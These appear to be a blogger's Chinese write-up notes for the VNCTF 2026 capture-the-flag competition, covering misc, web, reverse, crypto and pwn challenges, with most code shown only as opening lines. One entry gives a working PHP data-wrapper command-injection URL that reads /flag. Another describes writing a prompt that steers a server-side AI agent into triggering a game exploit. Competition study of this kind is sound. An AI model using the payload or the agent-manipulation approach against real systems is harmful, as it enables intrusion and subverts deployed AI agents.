【比赛】2026-vnctf
misc
Welcome T0 VNCTF
MyMnemonic
他只留下了这些
- 图片后面手动提出来一个图片
- 01反过来二进制转字符
import urllib.request, urllib.parse |
web
Markdown2world
world? word? wod? wd? w?
1st Special Bonus:若一血者赛后同意公布 wp,可以额外获得 ¥50 的奖金
出题人:q1uf3ng
难度:中等
signin
|
http://114.66.24.228:31500/?file=data:,<?=`$_GET[a]`;&a=cat /flag |
reverse
ez_maze
魔改
- 手动失败找不到大跳(菜
import pefile |
- python 1.py 162902_ezre.exe
- 检测长跳转保存内存信息
- ida看bin
-
在内存布局中,增加列索引通常意味着向右移动,增加行索引通常意味着向下移动
-
这里都是反的
-
偷迷宫图
from unicorn import * |
- ok现在啥都有了
from unicorn import * |
- https://singlehorn.github.io/2026/02/04/VNCTF2026出题笔记/
- 官方wp
- 和ai一起复盘下
RSP大法(ESP 定律)原理:
壳代码在运行开始时,会把当前的寄存器状态(RDI, RSI, RBP 等) 压入栈(PUSH) 保存起来。然后壳开始运行(解压代码、处理导入表等)。当壳运行结束,准备跳转回原始程序入口(OEP)之前,它必须把之前保存的寄存器状态 弹出栈(POP) 恢复原样。
RSP 大法 就是在“入栈”完成后,在栈顶位置放一个“警报器”(硬件访问断点)。当壳代码运行结束,试图“出栈”恢复数据时,就会触碰这个警报器,程序自动断下。此时,你往往就在 OEP 的门口了。
- 花指令跳过:
- F8跳不过去,直接在跳转目标)上按 F4 (运行到光标处)。
- 断点F9
- 判断为mfc逆向,一般通过导入表判断
- 我勒个最近居然学到过,点击跳转之前笔记
对于 mfc 逆向,可以使用 xspy 来找控件函数
import ctypes |
delicious obf
- 没有解出来的,跟着官方wp复盘
crypto
ezov
可以炒俩菜…
出题人:n1gh7ma12e
难度:困难
- sage,同目录放pub
- 本地伪造admin的签名
import os |
math_rsa
import math |
Schnorr
Schnorr protocol 具有 Special Honest Verifier Zero-Knowledge,该怎么得到flag呢?
import socket |
- 随机数重复
- 算私匙
pwn
eat some AI
题目描述
本题目包含两个服务端口,分别用于漏洞挖掘和 AI 操控。
- 游戏测试端口 (NC Port)
功能: 提供游戏程序的直接交互接口。
用途: 你可以通过此端口连接到游戏环境,进行模糊测试(Fuzzing)或手动尝试,以寻找游戏内存在的漏洞。
注意: 此环境不包含真实的 Flag,仅供测试漏洞使用。 - AI Agent 控制台 (Web Port)
功能: 提供一个 Web 界面,用于向后台 AI Agent 发送策略指令(System Prompt)。
用途: AI Agent 运行在拥有真实 Flag 的服务器上。你需要编写一段 Prompt,指导 AI 自动玩游戏。
目标: 通过精心设计的 Prompt,让 AI 在玩游戏的过程中触发你在测试端口发现的漏洞,从而获取 Flag。
玩法说明
连接测试端口,分析 game 二进制文件,找到获取 shell 或读取 flag 的利用路径。
访问 AI 控制台,编写 Prompt。你的 Prompt 需要教会 AI 如何一步步执行到达漏洞触发点的操作。
观察 AI 的操作日志,调整 Prompt 直到成功拿到 Flag。
出题人:inkey
难度:简单
你要扮演一个只听指令的漏洞测试员。 |
vm-syscall
好像比常规的vm-syscall少了点什么?
出题人:yfor
难度:简单
执行原生的 syscall 指令
execve调用获取Shell
from pwn import * |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 落殷回的博客!
评论

















